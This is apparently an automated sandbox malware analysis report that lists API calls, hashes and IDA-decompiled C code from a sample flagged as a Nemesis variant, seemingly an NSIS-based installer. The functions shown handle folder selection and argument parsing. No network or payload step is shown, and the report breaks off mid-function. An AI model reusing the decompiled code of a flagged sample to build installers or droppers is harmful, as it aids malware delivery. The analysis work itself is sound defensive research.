                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040506D
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00405082
                                                                          • GlobalFree.KERNEL32(?), ref: 00405092
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040510B
                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004051B4
                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C3
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E3
                                                                          • ShowWindow.USER32(?,00000000), ref: 00405231
                                                                          • GetDlgItem.USER32(?,000003FE), ref: 0040523C
                                                                          • ShowWindow.USER32(00000000), ref: 00405243
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                          • String ID: $M$N
                                                                          • API String ID: 1638840714-813528018
                                                                          • Opcode ID: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                                          • Instruction ID: ace54df752983209bd77257c2b819bbd2f8b8ae60686516a6448f39b7f2ae2b0
                                                                          • Opcode Fuzzy Hash: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                                          • Instruction Fuzzy Hash: E50270B0900209EFDB109FA4DD85AAE7BB5FB84314F10817AF650BA2E1D7799D42CF58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 78%
                                                                          			E004046E6(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				long _v16;
                                                                          				long _v20;
                                                                          				long _v24;
                                                                          				char _v28;
                                                                          				intOrPtr _v32;
                                                                          				long _v36;
                                                                          				char _v40;
                                                                          				unsigned int _v44;
                                                                          				signed int _v48;
                                                                          				WCHAR* _v56;
                                                                          				intOrPtr _v60;
                                                                          				intOrPtr _v64;
                                                                          				intOrPtr _v68;
                                                                          				WCHAR* _v72;
                                                                          				void _v76;
                                                                          				struct HWND__* _v80;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				intOrPtr _t82;
                                                                          				long _t87;
                                                                          				short* _t89;
                                                                          				void* _t95;
                                                                          				signed int _t96;
                                                                          				int _t109;
                                                                          				signed short _t114;
                                                                          				signed int _t118;
                                                                          				struct HWND__** _t122;
                                                                          				intOrPtr* _t138;
                                                                          				WCHAR* _t146;
                                                                          				unsigned int _t150;
                                                                          				signed int _t152;
                                                                          				unsigned int _t156;
                                                                          				signed int _t158;
                                                                          				signed int* _t159;
                                                                          				signed int* _t160;
                                                                          				struct HWND__* _t166;
                                                                          				struct HWND__* _t167;
                                                                          				int _t169;
                                                                          				unsigned int _t197;
                                                                          
                                                                          				_t156 = __edx;
                                                                          				_t82 =  *0x42c220; // 0x6ccd6c
                                                                          				_v32 = _t82;
                                                                          				_t2 = _t82 + 0x3c; // 0x0
                                                                          				_t3 = _t82 + 0x38; // 0x0
                                                                          				_t146 = ( *_t2 << 0xb) + 0x435000;
                                                                          				_v12 =  *_t3;
                                                                          				if(_a8 == 0x40b) {
                                                                          					E004058C8(0x3fb, _t146);
                                                                          					E00406516(_t146);
                                                                          				}
                                                                          				_t167 = _a4;
                                                                          				if(_a8 != 0x110) {
                                                                          					L8:
                                                                          					if(_a8 != 0x111) {
                                                                          						L20:
                                                                          						if(_a8 == 0x40f) {
                                                                          							L22:
                                                                          							_v8 = _v8 & 0x00000000;
                                                                          							_v12 = _v12 & 0x00000000;
                                                                          							E004058C8(0x3fb, _t146);
                                                                          							if(E00405C5B(_t186, _t146) == 0) {
                                                                          								_v8 = 1;
                                                                          							}
                                                                          							E00406282(0x42b218, _t146);
                                                                          							_t87 = E0040665C(1);
                                                                          							_v16 = _t87;
                                                                          							if(_t87 == 0) {
                                                                          								L30:
                                                                          								E00406282(0x42b218, _t146);
                                                                          								_t89 = E00405BFE(0x42b218);
                                                                          								_t158 = 0;
                                                                          								if(_t89 != 0) {
                                                                          									 *_t89 = 0;
                                                                          								}
                                                                          								if(GetDiskFreeSpaceW(0x42b218,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                          									goto L35;
                                                                          								} else {
                                                                          									_t169 = 0x400;
                                                                          									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                          									asm("cdq");
                                                                          									_v48 = _t109;
                                                                          									_v44 = _t156;
                                                                          									_v12 = 1;
                                                                          									goto L36;
                                                                          								}
                                                                          							} else {
                                                                          								_t159 = 0;
                                                                          								if(0 == 0x42b218) {
                                                                          									goto L30;
                                                                          								} else {
                                                                          									goto L26;
                                                                          								}
                                                                          								while(1) {
                                                                          									L26:
                                                                          									_t114 = _v16(0x42b218,  &_v48,  &_v28,  &_v40);
                                                                          									if(_t114 != 0) {
                                                                          										break;
                                                                          									}
                                                                          									if(_t159 != 0) {
                                                                          										 *_t159 =  *_t159 & _t114;
                                                                          									}
                                                                          									_t160 = E00405B9F(0x42b218);
                                                                          									 *_t160 =  *_t160 & 0x00000000;
                                                                          									_t159 = _t160;
                                                                          									 *_t159 = 0x5c;
                                                                          									if(_t159 != 0x42b218) {
                                                                          										continue;
                                                                          									} else {
                                                                          										goto L30;
                                                                          									}
                                                                          								}
                                                                          								_t150 = _v44;
                                                                          								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                          								_v44 = _t150 >> 0xa;
                                                                          								_v12 = 1;
                                                                          								_t158 = 0;
                                                                          								__eflags = 0;
                                                                          								L35:
                                                                          								_t169 = 0x400;
                                                                          								L36:
                                                                          								_t95 = E00404B83(5);
                                                                          								if(_v12 != _t158) {
                                                                          									_t197 = _v44;
                                                                          									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                          										_v8 = 2;
                                                                          									}
                                                                          								}
                                                                          								if( *((intOrPtr*)( *0x433ebc + 0x10)) != _t158) {
                                                                          									E00404B6B(0x3ff, 0xfffffffb, _t95);
                                                                          									if(_v12 == _t158) {
                                                                          										SetDlgItemTextW(_a4, _t169, 0x42b208);
                                                                          									} else {
                                                                          										E00404AA2(_t169, 0xfffffffc, _v48, _v44);
                                                                          									}
                                                                          								}
                                                                          								_t96 = _v8;
                                                                          								 *0x434fa4 = _t96;
                                                                          								if(_t96 == _t158) {
                                                                          									_v8 = E0040140B(7);
                                                                          								}
                                                                          								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                          									_v8 = _t158;
                                                                          								}
                                                                          								E00404239(0 | _v8 == _t158);
                                                                          								if(_v8 == _t158 &&  *0x42d238 == _t158) {
                                                                          									E0040463F();
                                                                          								}
                                                                          								 *0x42d238 = _t158;
                                                                          								goto L53;
                                                                          							}
                                                                          						}
                                                                          						_t186 = _a8 - 0x405;
                                                                          						if(_a8 != 0x405) {
                                                                          							goto L53;
                                                                          						}
                                                                          						goto L22;
                                                                          					}
                                                                          					_t118 = _a12 & 0x0000ffff;
                                                                          					if(_t118 != 0x3fb) {
                                                                          						L12:
                                                                          						if(_t118 == 0x3e9) {
                                                                          							_t152 = 7;
                                                                          							memset( &_v76, 0, _t152 << 2);
                                                                          							_v80 = _t167;
                                                                          							_v72 = 0x42d248;
                                                                          							_v60 = E00404A3C;
                                                                          							_v56 = _t146;
                                                                          							_v68 = E004062A4(_t146, 0x42d248, _t167, 0x42ba20, _v12);
                                                                          							_t122 =  &_v80;
                                                                          							_v64 = 0x41;
                                                                          							__imp__SHBrowseForFolderW(_t122);
                                                                          							if(_t122 == 0) {
                                                                          								_a8 = 0x40f;
                                                                          							} else {
                                                                          								__imp__CoTaskMemFree(_t122);
                                                                          								E00405B53(_t146);
                                                                          								_t125 =  *((intOrPtr*)( *0x434ef4 + 0x11c));
                                                                          								if( *((intOrPtr*)( *0x434ef4 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry") {
                                                                          									E004062A4(_t146, 0x42d248, _t167, 0, _t125);
                                                                          									if(lstrcmpiW(0x432e80, 0x42d248) != 0) {
                                                                          										lstrcatW(_t146, 0x432e80);
                                                                          									}
                                                                          								}
                                                                          								 *0x42d238 =  *0x42d238 + 1;
                                                                          								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                          							}
                                                                          						}
                                                                          						goto L20;
                                                                          					}
                                                                          					if(_a12 >> 0x10 != 0x300) {
                                                                          						goto L53;
                                                                          					}
                                                                          					_a8 = 0x40f;
                                                                          					goto L12;
                                                                          				} else {
                                                                          					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                          					if(E00405BCA(_t146) != 0 && E00405BFE(_t146) == 0) {
                                                                          						E00405B53(_t146);
                                                                          					}
                                                                          					 *0x433eb8 = _t167;
                                                                          					SetWindowTextW(_t166, _t146);
                                                                          					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                          					_push(1);
                                                                          					E00404217(_t167);
                                                                          					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                          					_push(0x14);
                                                                          					E00404217(_t167);
                                                                          					E0040424C(_t166);
                                                                          					_t138 = E0040665C(7);
                                                                          					if(_t138 == 0) {
                                                                          						L53:
                                                                          						return E0040427E(_a8, _a12, _a16);
                                                                          					} else {
                                                                          						 *_t138(_t166, 1);
                                                                          						goto L8;
                                                                          					}
                                                                          				}
                                                                          			}

                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404735
                                                                          • SetWindowTextW.USER32(00000000,-00435000), ref: 0040475F
                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404810
                                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040481B
                                                                          • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,-00435000), ref: 0040484D
                                                                          • lstrcatW.KERNEL32(-00435000,Call), ref: 00404859
                                                                          • SetDlgItemTextW.USER32(?,000003FB,-00435000), ref: 0040486B
                                                                            • Part of subcall function 004058C8: GetDlgItemTextW.USER32(?,?,00000400,004048A2), ref: 004058DB
                                                                            • Part of subcall function 00406516: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75523420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                                            • Part of subcall function 00406516: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                                            • Part of subcall function 00406516: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75523420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                                            • Part of subcall function 00406516: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75523420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                                          • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,-00435000,00000001,0042B218,-00435000,-00435000,000003FB,-00435000), ref: 0040492E
                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404949
                                                                            • Part of subcall function 00404AA2: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00435000), ref: 00404B43
                                                                            • Part of subcall function 00404AA2: wsprintfW.USER32 ref: 00404B4C
                                                                            • Part of subcall function 00404AA2: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                          • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry$Call
                                                                          • API String ID: 2624150263-3859727251
                                                                          • Opcode ID: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
                                                                          • Instruction ID: b9cd804fa769b9c0a994065299bacf789a546679ae48146ccc486c737bfd155f
                                                                          • Opcode Fuzzy Hash: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
                                                                          • Instruction Fuzzy Hash: CBA175F1A00209ABDB11AFA5CD41AAFB7B8EF84354F10847BF601B62D1D77C99418B6D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 95%
                                                                          			E10001B18() {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				signed int _v16;
                                                                          				signed int _v20;
                                                                          				WCHAR* _v24;
                                                                          				WCHAR* _v28;
                                                                          				signed int _v32;
                                                                          				signed int _v36;
                                                                          				signed int _v40;
                                                                          				WCHAR* _v44;
                                                                          				signed int _v48;
                                                                          				void* _v52;
                                                                          				intOrPtr _v56;
                                                                          				WCHAR* _t199;
                                                                          				signed int _t202;
                                                                          				void* _t204;
                                                                          				void* _t206;
                                                                          				WCHAR* _t208;
                                                                          				void* _t216;
                                                                          				struct HINSTANCE__* _t217;
                                                                          				struct HINSTANCE__* _t218;
                                                                          				struct HINSTANCE__* _t220;
                                                                          				signed short _t222;
                                                                          				struct HINSTANCE__* _t225;
                                                                          				struct HINSTANCE__* _t227;
                                                                          				void* _t228;
                                                                          				intOrPtr* _t229;
                                                                          				void* _t240;
                                                                          				signed char _t241;
                                                                          				signed int _t242;
                                                                          				struct HINSTANCE__* _t248;
                                                                          				void* _t249;
                                                                          				signed int _t251;
                                                                          				short* _t253;
                                                                          				signed int _t259;
                                                                          				void* _t260;
                                                                          				signed int _t263;
                                                                          				signed int _t266;
                                                                          				signed int _t267;
                                                                          				signed int _t272;
                                                                          				signed int _t273;
                                                                          				signed int _t274;
                                                                          				signed int _t275;
                                                                          				void* _t278;
                                                                          				void* _t282;
                                                                          				struct HINSTANCE__* _t284;
                                                                          				signed int _t287;
                                                                          				void _t288;
                                                                          				signed int _t289;
                                                                          				signed int _t301;
                                                                          				signed int _t302;
                                                                          				signed short _t308;
                                                                          				signed int _t309;
                                                                          				WCHAR* _t310;
                                                                          				WCHAR* _t312;
                                                                          				WCHAR* _t313;
                                                                          				struct HINSTANCE__* _t314;
                                                                          				void* _t316;
                                                                          				signed int _t318;
                                                                          				void* _t319;
                                                                          
                                                                          				_t284 = 0;
                                                                          				_v32 = 0;
                                                                          				_v36 = 0;
                                                                          				_v16 = 0;
                                                                          				_v8 = 0;
                                                                          				_v40 = 0;
                                                                          				_t319 = 0;
                                                                          				_v48 = 0;
                                                                          				_t199 = E1000121B();
                                                                          				_v24 = _t199;
                                                                          				_v28 = _t199;
                                                                          				_v44 = E1000121B();
                                                                          				_t309 = E10001243();
                                                                          				_v52 = _t309;
                                                                          				_v12 = _t309;
                                                                          				while(1) {
                                                                          					_t202 = _v32;
                                                                          					_v56 = _t202;
                                                                          					if(_t202 != _t284 && _t319 == _t284) {
                                                                          						break;
                                                                          					}
                                                                          					_t308 =  *_t309;
                                                                          					_t287 = _t308 & 0x0000ffff;
                                                                          					_t204 = _t287 - _t284;
                                                                          					if(_t204 == 0) {
                                                                          						_t33 =  &_v32;
                                                                          						 *_t33 = _v32 | 0xffffffff;
                                                                          						__eflags =  *_t33;
                                                                          						L17:
                                                                          						_t206 = _v56 - _t284;
                                                                          						if(_t206 == 0) {
                                                                          							__eflags = _t319 - _t284;
                                                                          							 *_v28 = _t284;
                                                                          							if(_t319 == _t284) {
                                                                          								_t319 = GlobalAlloc(0x40, 0x1ca4);
                                                                          								 *(_t319 + 0x1010) = _t284;
                                                                          								 *(_t319 + 0x1014) = _t284;
                                                                          							}
                                                                          							_t288 = _v36;
                                                                          							_t43 = _t319 + 8; // 0x8
                                                                          							_t208 = _t43;
                                                                          							_t44 = _t319 + 0x808; // 0x808
                                                                          							_t310 = _t44;
                                                                          							 *_t319 = _t288;
                                                                          							_t289 = _t288 - _t284;
                                                                          							__eflags = _t289;
                                                                          							 *_t208 = _t284;
                                                                          							 *_t310 = _t284;
                                                                          							 *(_t319 + 0x1008) = _t284;
                                                                          							 *(_t319 + 0x100c) = _t284;
                                                                          							 *(_t319 + 4) = _t284;
                                                                          							if(_t289 == 0) {
                                                                          								__eflags = _v28 - _v24;
                                                                          								if(_v28 == _v24) {
                                                                          									goto L39;
                                                                          								}
                                                                          								_t316 = 0;
                                                                          								GlobalFree(_t319);
                                                                          								_t319 = E10001311(_v24);
                                                                          								__eflags = _t319 - _t284;
                                                                          								if(_t319 == _t284) {
                                                                          									goto L39;
                                                                          								} else {
                                                                          									goto L32;
                                                                          								}
                                                                          								while(1) {
                                                                          									L32:
                                                                          									_t240 =  *(_t319 + 0x1ca0);
                                                                          									__eflags = _t240 - _t284;
                                                                          									if(_t240 == _t284) {
                                                                          										break;
                                                                          									}
                                                                          									_t316 = _t319;
                                                                          									_t319 = _t240;
                                                                          									__eflags = _t319 - _t284;
                                                                          									if(_t319 != _t284) {
                                                                          										continue;
                                                                          									}
                                                                          									break;
                                                                          								}
                                                                          								__eflags = _t316 - _t284;
                                                                          								if(_t316 != _t284) {
                                                                          									 *(_t316 + 0x1ca0) = _t284;
                                                                          								}
                                                                          								_t241 =  *(_t319 + 0x1010);
                                                                          								__eflags = _t241 & 0x00000008;
                                                                          								if((_t241 & 0x00000008) == 0) {
                                                                          									_t242 = _t241 | 0x00000002;
                                                                          									__eflags = _t242;
                                                                          									 *(_t319 + 0x1010) = _t242;
                                                                          								} else {
                                                                          									_t319 = E1000158F(_t319);
                                                                          									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
                                                                          								}
                                                                          								goto L39;
                                                                          							} else {
                                                                          								_t301 = _t289 - 1;
                                                                          								__eflags = _t301;
                                                                          								if(_t301 == 0) {
                                                                          									L28:
                                                                          									lstrcpyW(_t208, _v44);
                                                                          									L29:
                                                                          									lstrcpyW(_t310, _v24);
                                                                          									L39:
                                                                          									_v12 = _v12 + 2;
                                                                          									_v28 = _v24;
                                                                          									L63:
                                                                          									if(_v32 != 0xffffffff) {
                                                                          										_t309 = _v12;
                                                                          										continue;
                                                                          									}
                                                                          									break;
                                                                          								}
                                                                          								_t302 = _t301 - 1;
                                                                          								__eflags = _t302;
                                                                          								if(_t302 == 0) {
                                                                          									goto L29;
                                                                          								}
                                                                          								__eflags = _t302 != 1;
                                                                          								if(_t302 != 1) {
                                                                          									goto L39;
                                                                          								}
                                                                          								goto L28;
                                                                          							}
                                                                          						}
                                                                          						if(_t206 != 1) {
                                                                          							goto L39;
                                                                          						}
                                                                          						_t248 = _v16;
                                                                          						if(_v40 == _t284) {
                                                                          							_t248 = _t248 - 1;
                                                                          						}
                                                                          						 *(_t319 + 0x1014) = _t248;
                                                                          						goto L39;
                                                                          					}
                                                                          					_t249 = _t204 - 0x23;
                                                                          					if(_t249 == 0) {
                                                                          						__eflags = _t309 - _v52;
                                                                          						if(_t309 <= _v52) {
                                                                          							L15:
                                                                          							_v32 = _t284;
                                                                          							_v36 = _t284;
                                                                          							goto L17;
                                                                          						}
                                                                          						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
                                                                          						if( *((short*)(_t309 - 2)) != 0x3a) {
                                                                          							goto L15;
                                                                          						}
                                                                          						__eflags = _v32 - _t284;
                                                                          						if(_v32 == _t284) {
                                                                          							L40:
                                                                          							_t251 = _v32 - _t284;
                                                                          							__eflags = _t251;
                                                                          							if(_t251 == 0) {
                                                                          								__eflags = _t287 - 0x2a;
                                                                          								if(_t287 == 0x2a) {
                                                                          									_v36 = 2;
                                                                          									L61:
                                                                          									_t309 = _v12;
                                                                          									_v28 = _v24;
                                                                          									_t284 = 0;
                                                                          									__eflags = 0;
                                                                          									L62:
                                                                          									_t318 = _t309 + 2;
                                                                          									__eflags = _t318;
                                                                          									_v12 = _t318;
                                                                          									goto L63;
                                                                          								}
                                                                          								__eflags = _t287 - 0x2d;
                                                                          								if(_t287 == 0x2d) {
                                                                          									L131:
                                                                          									__eflags = _t308 - 0x2d;
                                                                          									if(_t308 != 0x2d) {
                                                                          										L134:
                                                                          										_t253 = _t309 + 2;
                                                                          										__eflags =  *_t253 - 0x3a;
                                                                          										if( *_t253 != 0x3a) {
                                                                          											L141:
                                                                          											_v28 =  &(_v28[0]);
                                                                          											 *_v28 = _t308;
                                                                          											goto L62;
                                                                          										}
                                                                          										__eflags = _t308 - 0x2d;
                                                                          										if(_t308 == 0x2d) {
                                                                          											goto L141;
                                                                          										}
                                                                          										_v36 = 1;
                                                                          										L137:
                                                                          										_v12 = _t253;
                                                                          										__eflags = _v28 - _v24;
                                                                          										if(_v28 <= _v24) {
                                                                          											 *_v44 = _t284;
                                                                          										} else {
                                                                          											 *_v28 = _t284;
                                                                          											lstrcpyW(_v44, _v24);
                                                                          										}
                                                                          										goto L61;
                                                                          									}
                                                                          									_t253 = _t309 + 2;
                                                                          									__eflags =  *_t253 - 0x3e;
                                                                          									if( *_t253 != 0x3e) {
                                                                          										goto L134;
                                                                          									}
                                                                          									_v36 = 3;
                                                                          									goto L137;
                                                                          								}
                                                                          								__eflags = _t287 - 0x3a;
                                                                          								if(_t287 != 0x3a) {
                                                                          									goto L141;
                                                                          								}
                                                                          								goto L131;
                                                                          							}
                                                                          							_t259 = _t251 - 1;
                                                                          							__eflags = _t259;
                                                                          							if(_t259 == 0) {
                                                                          								L74:
                                                                          								_t260 = _t287 - 0x22;
                                                                          								__eflags = _t260 - 0x55;
                                                                          								if(_t260 > 0x55) {
                                                                          									goto L61;
                                                                          								}
                                                                          								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
                                                                          									case 0:
                                                                          										__ecx = _v24;
                                                                          										__edi = _v12;
                                                                          										while(1) {
                                                                          											__edi = __edi + 1;
                                                                          											__edi = __edi + 1;
                                                                          											_v12 = __edi;
                                                                          											__ax =  *__edi;
                                                                          											__eflags = __ax - __dx;
                                                                          											if(__ax != __dx) {
                                                                          												goto L116;
                                                                          											}
                                                                          											L115:
                                                                          											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                                          											if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                                          												L120:
                                                                          												 *__ecx =  *__ecx & 0x00000000;
                                                                          												__ebx = E1000122C(_v24);
                                                                          												goto L91;
                                                                          											}
                                                                          											L116:
                                                                          											__eflags = __ax;
                                                                          											if(__ax == 0) {
                                                                          												goto L120;
                                                                          											}
                                                                          											__eflags = __ax - __dx;
                                                                          											if(__ax == __dx) {
                                                                          												__edi = __edi + 1;
                                                                          												__edi = __edi + 1;
                                                                          												__eflags = __edi;
                                                                          											}
                                                                          											__ax =  *__edi;
                                                                          											 *__ecx =  *__edi;
                                                                          											__ecx = __ecx + 1;
                                                                          											__ecx = __ecx + 1;
                                                                          											__edi = __edi + 1;
                                                                          											__edi = __edi + 1;
                                                                          											_v12 = __edi;
                                                                          											__ax =  *__edi;
                                                                          											__eflags = __ax - __dx;
                                                                          											if(__ax != __dx) {
                                                                          												goto L116;
                                                                          											}
                                                                          											goto L115;
                                                                          										}
                                                                          									case 1:
                                                                          										_v8 = 1;
                                                                          										goto L61;
                                                                          									case 2:
                                                                          										_v8 = _v8 | 0xffffffff;
                                                                          										goto L61;
                                                                          									case 3:
                                                                          										_v8 = _v8 & 0x00000000;
                                                                          										_v20 = _v20 & 0x00000000;
                                                                          										_v16 = _v16 + 1;
                                                                          										goto L79;
                                                                          									case 4:
                                                                          										__eflags = _v20;
                                                                          										if(_v20 != 0) {
                                                                          											goto L61;
                                                                          										}
                                                                          										_v12 = _v12 - 2;
                                                                          										__ebx = E1000121B();
                                                                          										 &_v12 = E10001A9F( &_v12);
                                                                          										__eax = E10001470(__edx, __eax, __edx, __ebx);
                                                                          										goto L91;
                                                                          									case 5:
                                                                          										L99:
                                                                          										_v20 = _v20 + 1;
                                                                          										goto L61;
                                                                          									case 6:
                                                                          										_push(7);
                                                                          										goto L107;
                                                                          									case 7:
                                                                          										_push(0x19);
                                                                          										goto L127;
                                                                          									case 8:
                                                                          										_push(0x15);
                                                                          										goto L127;
                                                                          									case 9:
                                                                          										_push(0x16);
                                                                          										goto L127;
                                                                          									case 0xa:
                                                                          										_push(0x18);
                                                                          										goto L127;
                                                                          									case 0xb:
                                                                          										_push(5);
                                                                          										goto L107;
                                                                          									case 0xc:
                                                                          										__eax = 0;
                                                                          										__eax = 1;
                                                                          										goto L85;
                                                                          									case 0xd:
                                                                          										_push(6);
                                                                          										goto L107;
                                                                          									case 0xe:
                                                                          										_push(2);
                                                                          										goto L107;
                                                                          									case 0xf:
                                                                          										_push(3);
                                                                          										goto L107;
                                                                          									case 0x10:
                                                                          										_push(0x17);
                                                                          										L127:
                                                                          										_pop(__ebx);
                                                                          										goto L92;
                                                                          									case 0x11:
                                                                          										__eax =  &_v12;
                                                                          										__eax = E10001A9F( &_v12);
                                                                          										__ebx = __eax;
                                                                          										__ebx = __eax + 1;
                                                                          										__eflags = __ebx - 0xb;
                                                                          										if(__ebx < 0xb) {
                                                                          											__ebx = __ebx + 0xa;
                                                                          										}
                                                                          										goto L91;
                                                                          									case 0x12:
                                                                          										__ebx = 0xffffffff;
                                                                          										goto L92;
                                                                          									case 0x13:
                                                                          										_v48 = _v48 + 1;
                                                                          										_push(4);
                                                                          										_pop(__eax);
                                                                          										goto L85;
                                                                          									case 0x14:
                                                                          										__eax = 0;
                                                                          										__eflags = 0;
                                                                          										goto L85;
                                                                          									case 0x15:
                                                                          										_push(4);
                                                                          										L107:
                                                                          										_pop(__eax);
                                                                          										L85:
                                                                          										__edi = _v16;
                                                                          										__ecx =  *(0x1000305c + __eax * 4);
                                                                          										__edi = _v16 << 5;
                                                                          										__edx = 0;
                                                                          										__edi = (_v16 << 5) + __esi;
                                                                          										__edx = 1;
                                                                          										__eflags = _v8 - 0xffffffff;
                                                                          										_v40 = 1;
                                                                          										 *(__edi + 0x1018) = __eax;
                                                                          										if(_v8 == 0xffffffff) {
                                                                          											L87:
                                                                          											__ecx = __edx;
                                                                          											L88:
                                                                          											__eflags = _v8 - __edx;
                                                                          											 *(__edi + 0x1028) = __ecx;
                                                                          											if(_v8 == __edx) {
                                                                          												__eax =  &_v12;
                                                                          												__eax = E10001A9F( &_v12);
                                                                          												__eax = __eax + 1;
                                                                          												__eflags = __eax;
                                                                          												_v8 = __eax;
                                                                          											}
                                                                          											__eax = _v8;
                                                                          											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                                          											_t133 = _v16 + 0x81; // 0x81
                                                                          											_t133 = _t133 << 5;
                                                                          											__eax = 0;
                                                                          											__eflags = 0;
                                                                          											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
                                                                          											 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                                          											 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                                          											goto L91;
                                                                          										}
                                                                          										__eflags = __ecx;
                                                                          										if(__ecx > 0) {
                                                                          											goto L88;
                                                                          										}
                                                                          										goto L87;
                                                                          									case 0x16:
                                                                          										_t262 =  *(_t319 + 0x1014);
                                                                          										__eflags = _t262 - _v16;
                                                                          										if(_t262 > _v16) {
                                                                          											_v16 = _t262;
                                                                          										}
                                                                          										_v8 = _v8 & 0x00000000;
                                                                          										_v20 = _v20 & 0x00000000;
                                                                          										_v36 - 3 = _t262 - (_v36 == 3);
                                                                          										if(_t262 != _v36 == 3) {
